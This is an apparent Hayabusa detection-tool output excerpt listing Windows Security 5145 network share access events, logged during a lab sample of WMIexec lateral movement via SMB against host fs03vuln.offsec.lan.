+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Default\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
